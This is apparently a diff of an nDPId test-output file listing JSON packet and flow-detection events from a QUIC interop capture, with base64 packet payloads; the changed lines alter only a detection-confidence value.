02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1603816434680,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434680,"pkt":"PKn0qB\/spJGxgjQ5ht1gCSIhBNg6MiABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9AQQtsQAAAABgAlC2BNgRMiABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWmsgBuwTYjDrICgoKCgjzgkejWnQFTwAARL7AEcGzrGiFbLDVVitPMjpX6T6us8klH0LZdsk33gK4kca790hWc9lEqiHw2zuG3cvmTx4edwCefhx9uVFQHbwCX7OdVaAKALQsTDf2esUnZnHqAVwqfHs0alGH87lg8LOQYMLCyJ5o4796Hi54oLNHvp1iBOlawAP1QQwkOrhTac81Z\/3lqw5txy4fqI2ulRUcc8HMVbAvriqgCRBafLPQysmCOVqjinACocPdi0ZP1pUx0qn0+kKcTF+7gFuANdSw5ZrXDF5v6YKUxiJ6vSw8Hy7vrpHpUiN+5fprlESKduOvuve2w8S0Rn1T\/QCLnqgsvW4zVX2obPqKMBoLM0FaRFm0tupv3jD2Bo6wMhEP7UVS6LQVCbX\/F5hZ42FQPL174ha0Yjp7fot\/ow92n0s8sDYpXdyVzzUtmI9H59mtClZBkXIm4hCy5YwKUBE5Htf0HL6v7tX\/C56I4bHgjD1kXDqKwEusnGxfxLkbm5cB84\/UPVfX54l5AlcUWrKt\/sWPHXza3lrXmjl3iKLayJGvSvxgwAyLdj+1dAf2mHjT3T9ZeLg4TPyNz17SLyKDROZpbuZtC2zCbnl+NoReuXxIIu553FeA7K1Fq06E+HYHhMw9+fWseAQfiQhoIBqlHGL+6zzFwJx8LqsX2kF9IlqJJkfGxh2dCK8J4o5uVhtnU3J2xj0GDXLtBrNSCk7DDd67hChkNkJ\/zra77RGExcKdo9KUDUUYykOLFAbdNAsP9djZJfE2+FIW26Q0ve6PvxjGma3cI1DAbfodw3x7gmpMenGXbAesto3GigfY8Dqk5DyVN2us4Q8jxijjrwa1uGb6WCWFIbPGsRxa2EtoUIAHsP\/pagnvZR1tK2myhxOFZczPeNlpxk1o3SOIXdZrMfCNqe8UgV89dZHklMi3hgQCyoO5n2p9n2UNtckDsulzdkWAkN7ELjfKSw3xLKX8QYYwRNZkrnslYV\/gNUyPn\/DAHxcrYsCggnVPpcMfjQHnjiySyU7agWUfxfnrK5KR0Hz1uxcerQD9r2dHrU5GwRgAJqiERgTrm61j0\/9g6EnJzaJxnY2YL\/8StPHOT4TbswEzgPxmOMhq3B3NyVJmRRvGKyoWosF33+eeRJZtqDmGzt7Y\/QslvmPGsoNyGhIfWD4qHCWm8JN2zWi8NKuiyFpgsC\/gseqp2COjYeHLzTsHE8Lb24ziOBbxiS8nhlUeyvkTXTnPgtpZev\/ducm+wW0A+YY2gp+9vovT+lMYKPoIIeW89qmvsTK34QrhAHBV8Gdi7IG6oE67NdkIrFleG4EtBQyuNTVG\/Hni6IlsFEhmcMOi9gtqRQF0bots7U2r2su6TX5cs\/tWsUtfcKDq01p1Oi+UeZRz\/V+lKX5GfCRE\/JIN8wqGMoYFzwTiwgXQFJuV\/tc8U4uoRYgnau5MAB9+BYOU44CnqwsIla5AaVfMisOMnVZhANbfOkDwWOMuBcFcvM4iPJEdLrpJXtiL7lozz\/DNjHrb6qIdiWBMUyCod\/1w5XY81jvBVw6EPdS52X\/61VYwnM6etnlrj2efLA=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1603816434682,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434682,"pkt":"PKn0qB\/spJGxgjQ5ht1gCzKCACMROyYGRwAAEAAAAAAAAGgWCCYgAQsHCsnVrqTT\/kdpHoB9Abu1EQAj2NGpAAAAAAAI+gzxyVlrPLD\/AAAd\/wAAHP8AABs="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1603816434684,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434684,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAiNhAAEARQ6HAqAGAyu7cXIm\/EVIE7DIpzgoKCgoIV4qr8UTBK3QAAETSh\/17BQebdhKt5N8exOyNj+uiOYMPWvj6jDz\/XRUXpazLTuGIaL+gAsTmd0\/ny+0FgJZmR3W9tTl2uiHStd0rHjDhZZpjA+Vv70KyXaIxYALOy77NR4C4EhjQ7Woy4Z1XktOMuzY1G1wK+\/m8WHSuXiS0ZJH0FyTMGjp1ybnyu6MTC\/32FsQ4+KBXvfT1hZaE3FEFqOfGH728c4f7jwV39sXMvsF\/koxt7XF+OaEoT44gruD3j1M3Pn+2KBK+MAfr0VIJTB\/qx0CUwI+AOjfOrOEwPlBTKV\/RpKd6AM0mgPkKYfiJQlRit614p6k0X9lbx\/f6ahWLCq72n2YzUVWYWdT5J7gjttfn3tAoB7zUzS53IQUv1B2zhYj8uYWCPv5E8X1+\/TvDaDXt2s1yt3mYps645wMsjGX9jfYnekRT\/suzL4Jvq5T+oMyQFpalloUrRQHYgV03PgJRooTK2iTJSDezMo3Sabn4X3VQSLr6CnIqGTTH4TZdTS1EPTMj1g2xj\/dIUvvG\/pFUdjLNu0inX1PgBZ1cWwdYMDOvaetqYINrUUAYfMt0S6ZnZpx8OdfUPc+mujDPZthVujZlugXTs5\/Mi1arhb7RDdu56QF0HkACvwfN4y6hPV9GkFI7UUzwkjbNgS+SVTyZpwJf1vfOY3NxgRH+ySFpHqqy7QQrR1g1b3fzph2N6Zo2yzEoxr3cQcaq6oirf5SKGC3qVOfI2XVtorskDTjDPZugOVkY\/anHMfrVansEFGxUEN\/DC\/sCrdnQCX2T0SNbs6Z3vWghQ\/Ttglq6nwriBypoi1GkgpMWRpNQC1+tftj6Y6qDc8PUt47spNcYJ0VauEV18MYpeZpOQrwmNsvWkYDeiXS3LX6E8xtGwpF4W5EfDLclRZBbPNPUZexMZprIpblVxLNvXkp38hv3mKP9juEW+w1x9u0\/FE+PXNXqQt+cpccucng\/siXW8dIomIy+1Vr2PrUvdyaaKk0C6UQxd5P55nB9LiOhbpyhKVQTsv\/+44XghuC1pJ3FXt2NjQe+CUcHyg\/CStdVZ77sBr3jEHJD5WyRhPOE0PHrKjEkwO61egIk2dYxhBIp8OCkst22lv5y0ZwcT34lkkTv5u3Z+PpFSID1U+kLTu+5h8UIdmdChB8Ic1cG4AQYLHLWNXQ2dMqc9hc5mVaWGdqVsXAgEZ8PmUGN1\/+K9d7hwED1E+zAtc4tOBuE\/zS269MNpdYACOTcy9RHUvjlSspQylJjubyYwnj40H3orsiMgpv6tA2AxST8dUKpvzYljGrSAdakZ46qVrbuEBiCGMTCs+\/UNgvM2e6Fe+6gqDCfOY\/zXSUtlduoc3jid15XCt88k2M9Kq40sh6m+8eKjtvlwD7XYwfSnLxwxhEyeUkGT+13FX++6oG59AfysFjC5iJYSscA+YXyA0hYuJ9OTtOQZg32pXfl5BmrmRqnRAIwBXmzbGgXzEsXtx+lmlWCK421d8ePwyDwI8wnHfI\/90mFIe34gGT+WMlq4ZgFubtwTSjzidVFs7GoczF7Lrr2uW4jA9qjpqY0sj9p\/VVph1PRzTPVNMdHm+sMkD3+hhI82joYjOeoRxcWEO0C7MjWGcq92hfnKcQSy875okSAGULGntKS3GeTR0gVMj+6KA=="} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1603816434685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434685,"pkt":"pJGxgjQ5PKn0qB\/sht1gD105BNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmgL0RUQTYZ0HNCgoKCggKh53oSKcUIwAARL7gnbCt\/i9esljBwsmPvsojrH1nHZVBY0xSwfKH3XUIijCNgd7Dz8vI4xY\/GVgHV60CIRICp6Kjnr0zMRCxb3nrCucJOyP18UJ2XfpoAWpzvs2pUT\/u95vGBd8XvGhGtYoLqIrMkwYTUuZWsLPdt9\/gzvA15FlJOa7ugVzGXmi7RWK2tRS2hGORcD238yWdl10gYN8ZAvJb8s0UeahNz4nqOB1o1ewm+JfW47bFEqheid7sAMQL3N59\/ISUhkQ8vC1I4dVehQTYmG2zs3sj46oOz5lAFlK26vOv5VRV5IPztRMlciR7V6Adse5xtWtlpuIXzn5\/UDxzj9dah7+yAdZOHeT0zLvwsIoGcoPRxB0MH96VRzKARwz+S7KKOKG8cm2If62RiaOWfmxkaI06NFuh2TWyOGI\/smeYiBlrsSEsSPLBOsy9YKqIRy2SnU5fpV0QIrpOULNF15tvg64kCSUJEHN7hq8wuLHUYVeVMfUb150XuMPRFaeDc+hRLxIgkKsegq\/1GMLnU3cw+YqqtGx9Y3AG3jCsYvczhQt97g+bEAD3lWpSQqlnbIPVaRxSBb\/m++vYk0m7W88TjbXZd39\/H0cIlTvJ\/Z0SYJpuIBWlYvloAhW8wQNQxVyWnDT8EGTCZMIdSLrubgSgxklIcQghvYxGjlenv1U\/xWA4GVcvaRa3KIrmqe9Suq7Jbom9YtFec\/KcUQuypqb9vLHQd\/Slh\/IgOY2LIPbfGrFqtZ5IZSSAFLezKKTHeEUDMMIvjY6nNjfQvhye7w\/iK57ylN1XmmiCsHB2UUISWzLgrbBn+zFoD8q39CqH1PUlQIwDNgZ6s2PfqPEu+x2StileWyY9B4yefqdiNXFJ7u0v6qBj8LUR9\/ZHKs9wt4Es5WiMRZRGcohtyH5Q2qGSEuh57YGdY2plV0kqxOJJg8WuHGwG80hM4Tuuqa2qTyvzRzxBzkkv7jnWbsOt8w6eogTolB5Yq2lNlcox1ozX09J\/4y2Mgjm9fxydUta2PLhNKNF24FGjs9TlXrGvWStOf+FVD0GqXkj4kfvlc5hUlqiu\/hxYQyz7qNm\/6LH0VCx9ePdDf6W4APXGgkkBgu34ndfqUtg0Sa2fWK+OElqxxZw1+Hjyk43LjolIsRbpcWkcSLKwQP4O5jLw4EENRtGoAdziVGhmLWY7AyDGDqDXD+zk0FkOZMfIjeyouDPo8iAsGYm9Ha0mLEq8OysomYrCzakDZNst43uj50cSwd\/VS+ATJsBvZ7N7sRLvBamrC1umCD7i4s16sQmoEu\/PSvNXlSeypCfAg2hJAeLhcz4\/B0WcrTcIC8sTScPAH3uwzv2dtb+6AkA7ey192Tem0ngjhVi9gaWtU5sFQIbMZEgPIufNBRz0zG92jR202hKnv2tVs8fpah1QPJuf+kSUD28xqWVBySjEINK1zyjumcct4vfD2Rv2hsFuDdEnRtRcJ\/VHoB5zsNZ72V1mw1n3OOM3pVkY4\/rmTj\/xZxixYjGJ4hQmi3ZfkZHdBqMDfT25BKOJoR4wohoVf2vU49x7VJnCxuwjZ+PxxTyZPpwTwZZg9+9l1NkFrr1xb3oTJlb1ej2KIFSLLbYLLG40yc\/N4lOiLv0z\/w=="} 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1603816434685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434685,"pkt":"pJGxgjQ5PKn0qB\/sht1gCmkdBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB0gARUgTYZd\/PCgoKCgjoF2NeZfCaVwAARL7J5XVlyOrShWgSY1170HREhMEudzqX7b4Uhkojh\/MAMJlRFRdXrnf0lcWEClMJfDhoWlt0RFozrof+Pnw6B4\/ZyoD0RVgGp53poT7G9iC\/absqyVIsEHLsIVC5iZKsIfFtdWkKkdpnRNCGnT3VGY+lFXxBZPJt0vOu0Y2zKMRZ1lC610Klnd+ZJcx\/qSoPqRUIsoETASUmzbWQ7TdG1oxWQGH3wcVc\/v0ICxVUtoMYgJeXx8betPxfyREuBm4E4FoTyJhXcui3XIN3o0Due9ptbZ7SBfuGpb8TN46lwteVUqUUJ5Xe9lf39a3FP9dO2Xqnjw\/WZZomS7Iw1nD9mfjLCEsYGSPz8KBf1FK8U9BWWKadaREsfFGSsUnk3AD67edvUllQXvSDtlbzAUvFF3HIenC2Cy9ysj2h2ptZLfbFln02ZGCulECgFzFtpNDys561LCsH00nvAhS+\/pbJhKpkIQwt944Www\/ODMtfhA6WoAEpgpG06f42PQF9unibmel+Q1UkCV\/Sju8NlC7DCa5v5QN61TvjaWLK+67RDNsHdrusmUnxS0Qw6MgCr1XJXgSd8aQkDA+Nthb+EBlxmaEXwuybb2XuVgqC4V6G6xFD3Gim1RJcrCQKLBGVfueSLYvhKVwT8SeP4SR+OZfWoWq9fjTaViFhYYCsic+3myY3YSADfawnGFA+SyhJdTjrJj9L1vETLMfU6LQ4fjJs\/8YN6WcxBXdSBCin3bSBe2urzqaduq+kb17UjxDbg4QJxXnAa7r5qUQIYXTqC81D8LDrVnVZEVBGUFKebfrcgAxOMID2c3r9c9lUOsj+C6sMlckNXJelOsGIB83E1w9dml1EmevOJyz+MzHSmFAJVMeyfthe7Acpa\/6iTFxUC2VqHJlZjwCn4\/6wRzHC9TG9Zo5VPWRd+g6TJGNweOX8P\/9ZlB9RFiPwzvHlNFT6b3Mb3QxWLg6Ttmg0E+ML1rtxKM7\/yRgs5vxr\/diUa1PzRXjEZ+f5zpp2kE91jKJH4+73tgEQMYk7Eyd89yRmygltVrH\/fU3Ue7GrFhffvVmLvE35MSx0aH6IGdc\/U1oMjWOy0EoTkWjTh0p859\/pRscc2n0uSgJ0X+9D\/EbzkVIZ39Oi5k4wHfsZGD8WTv3IQhB4KGqrNsOYfHpEFOYsQdn9gLcQXwn4iTTbKaZ9rDik21mQSKdUJWkKqJOll6AYoarRO+2QwNgtxGGc9KoDCliYHauCpZ+lGYjtpy5eB2tibMJTLE0Gnrzi6TXFgGqp4wUvIqEqIQ7kO3WFekwujCNCYafCZWYtZ66P1CWPtvc+cRSrUO6Bx299H6EewArx3M8oD1TU7RZVYNta1PmN9bWQg7109Ib8Pk3crjfxcU0dAj+led14LXpRrlgp\/QeJZZuc3wsMwiTDPy3TJcx5+ZXKykG0+Rze8up6KNJ0TOkliR5SFYCrvJk8ixSq\/yqeCqIEYozf9Q0bKCLl8\/Buyu+IUOQ+uNeuzWzi4apJbhNBlCaMuCrdvdjkQpiOWPf9EVqBWcYwBbWS1gM7Y0WFCSCyXc2PxB78fF4bL4IfjxhdAkZdz0MrFIiD9A7sCWzJyDkoQoFSPdTAM2SY\/PtnrUK9nA=="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1603816434686,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434686,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA9+cAAC0BNK0znmliwKgBgAMKTnsAAAAARQAFAF2XQAAwEYktwKgBgDOeaWKwwhFRBOz8KMwKCgoKCP1n32NN8EnlAABE0jB6HybCFUbabkBlXXQVvewn7zDYehbLSZDjKVLf8snzKJdjR\/3JsPdO+vxlafCYsOkUTueZwJWg10Sg8fn0URQdzFi5gf\/QXZQO6ykhfm8a5Zr2+yBt68dnry5zhANveVge4e8snv2G\/EjNXJKG6Jyq2Wd1UiHDsng78dU6PMilPEvqoDuVAeleo92UeM\/LYmvYaEQWibrlo50VzyM0Qv2OE8uBtE0321S2ppuHo\/ubVRja900u6Tdl87fZa+TqILwJoqVX3KxUJszQP\/m4sTr7SSAg4d30fbCCPgGuhd5vecogxfB3YV8fE8VleuNDGZEznGuTG3MEvmD8\/iDQCIxdLNqMLq4OHJR5K0P4db2PcHy\/HGrvnaBUxSsUFpFbt7dov\/pgLFhL9QjjASYLcFmP9aDGJ4WvT1nHm+247V70NABa4wQtolKRPLihtpaTI978PvhAx7OA\/FDrMALGCkkd0Ckzcuf5\/RdiusGznuJWz6dbRFAvYuAY6z+uTeSY3eMIQi5VhMcXXLlIqpnkVl9ay3z8cpya5MO76mkRAtNLAnc4uy4dq4IdWYKxFDEs514DLZLoll455nZesjVL6SKL9qMReSCKhO\/op5kVDv+GxSpbs9KycUr8HjhlDhtOqnPPf31XxGL0FX0honv9o2mTwKGu95c="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1603816434688,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434688,"pkt":"PKn0qB\/spJGxgjQ5ht1gAY5iACMRNCABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVGLOwAj7QnAAAAAAAAINUX0m0oVmLXKOtq6\/wAAHf8AABs="} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1603816434693,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434693,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApABAAEAR2hTAqAGAA3nyNu1wEVEE7JhqzAoKCgoI7mu7hqnhXwQAAETShPHzPPAkQK2NEhJGnleHaiN0ie5qTdnm464jrXCgs4dpEiXNx\/PGBx7TOLjXnxLSumidbRKwVj0cRR128B6iHNMflXwQht2t8Y44LmwMqcGdFgLa+9ZMaGseDnBaSdSq\/BTPBASRNPP5ViOFASdiCzWBBZ9WWzIm4Zq1cmr1m+3KYiXPZ4DYcjOiBC+RnrFuinz0kYMk86K9x6ewtyvVVkz06rH\/0pP52NDoXW\/b\/MQkNjC8KUi9qGQJPKOuv\/DmccHaQsbHCmJiyo\/0QNZTrabAtHI7akrTZimPvxnGDDh3iKeWTI0Rt9dVSQExok8KND6xq3GcpnEKSLoNMV4xJO\/u8Hd3ib0ZTAW90kp9rc7u7p5ChlZkz1hOn6CQxtLF+4Q0C+LoqzxjzQ7yi2OlbBMZIKyzLtWw7xW299MwVnAiFEtj5S1RjtdQdmj6SAPB0h4vvOCMTAjBLrzNUIzUQQ4418YwmRANW+EzePT6mR1Ale6pegThd1LeXLddvoztOKGJo5TEa5MgYMehxhTg2TXP6YXaavnooLGg557tbafcTn3wzp5jbVUwxY9sKGj16QzN8+Fynpug9j5\/9WGOFqWFzcYqmUsX0\/xG2xH8WvkKARD0l\/sk42N9NbTB7Ss95x\/zpvrC7DRs8wzKYSZy+NZzyMWwe4xcTPC8pdC3jzhcEXdF2RnCaPHIghUD9RT4W1CfQ1kNWOulxGvcIr6FHiUeq9MpQR4aV5XkRR5Ltsm0vYQyB2x6O6vPlGQo9UKOc2XAIsuJ\/UbYOmk2NYvlK5HnPtbkhJY\/IiZ7z23icAn3thnf9kKY5ERwFbNb\/un4e9T0EmsPw2t0OaIH16APDL4fOPl6+1VOOMCOqaajX6JJ\/\/VzPWdr3Gs+W1hKm0IJjwEBhbsb4P0Y6VCEvVHsNI7mTVZMkEAua9fwXy2V4utejHZLSRSgMPQJSvLG25D\/bKthcwd1lVPwIPmwpCJB1fyQWm6AhqFghO9Zupebv0zgTmzy1tLUnzVFLEzE4ypNxUpFeb7gzSfiS6a7+MCybpQYls379X4F53iU+GTINzG20LYm+XcA+4YEJemBM6vBH5vOwhicXfh\/S4xBSLLLmN+mSkM6sSSr11u3IsDj4PDyBLrk0cKt+Xez\/nYA53eqNQH8wobiK\/1UcQl+9e0C3Q5AQcsBs2MRhY6nnaLEFqMO55ANIVeq58cAWZ8Kve4BjvDSY3uaBdKWaqONn49IjBfiSMz4x\/Xbh8S6vECtoIhrWF90MTfHWh3iWZB5qXTSIFhe9owOmMU\/Usk6Uy8KzZy7KTlRZYfDqKbq7rcX5VnkanJDx7H6mBhnkfHnaTIQA9b0kFHyqiee8gwXA7SB4zEGStKbfX+Xbd7g69KwswEs89ObtiGhZFpjbWTpwnRcI37GAOjv5pgd2XQz9GL44DG\/Ek00OMz6SwbWFlAmxoWux+qNRG3HPl83lY7zEH0gjFnGpuAsctOGn\/CIgy+CcWiM9zeH26eSXIULjy6o2ia6cosWL5oxm4nSmaOz1jSNsNYx\/IuznZBNLujicdVabLMIwM5jHV5RNtJl7ORe2vMsPayIVVzDvXWDnuN4jRMZKSKWRDE7oTL2N532z74L8ugCqSdHwRCSsBvtnIezk0Djtg=="} 